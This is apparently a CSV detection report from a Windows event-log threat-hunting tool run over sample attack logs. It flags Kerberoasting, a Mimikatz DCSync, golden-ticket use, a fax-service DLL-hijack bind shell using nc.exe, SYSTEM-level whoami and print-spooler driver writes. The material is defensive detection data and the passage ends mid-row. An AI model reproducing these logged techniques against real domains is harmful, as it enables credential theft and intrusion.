2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: | Svc: | IP Addr: ::ffff:10.23.23.9 | Status: 0x25,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: Svc-SQL-DB01 | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,CredAccess,Suspicious Kerberos RC4 Ticket Encryption,,../hayabusa-rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:54.999 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c41e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c703,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c741,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:02:37.200 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:02:37.212 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:02:37.213 +09:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC Sync,,../hayabusa-rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:02:37.213 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x11b8cd00,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: FS02$ | Computer: - | IP Addr: 10.23.42.18 | LID: 0x11b8d014,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8d057,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8dcc1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9c0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9d3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9e5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9ea1f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Persis | Evas,Fax Service DLL Search Order Hijack,,../hayabusa-rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx
2020-08-03 01:24:07.559 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\pipey | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:07.561 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 864 | Tgt PGUID: 747F3D96-E309-5F26-0000-001021BC0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:07.561 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 820 | Tgt PGUID: 747F3D96-E309-5F26-0000-0010137B0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:08.403 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:08.403 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:25.728 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Users\IEUser\Tools\Misc\nc.exe | PID: 7836 | PGUID: 747F3D96-E8B8-5F26-0000-00100AA71A00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:25.728 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\FXSSVC.exe | PID: 
5252 | PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x3e7 | PID: 8104 | PGUID: 747F3D96-E8BA-5F26-0000-001035BE1A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 588 | PGUID: 747F3D96-E8BC-5F26-0000-0010F7C41A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-12 22:04:27.419 
+09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\Temp\__SKIP_1E14 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.454 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\{A6F2FD48-5F14-4B5F-ACC3-8DE2ACD8E384} | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 
747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRVUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File 
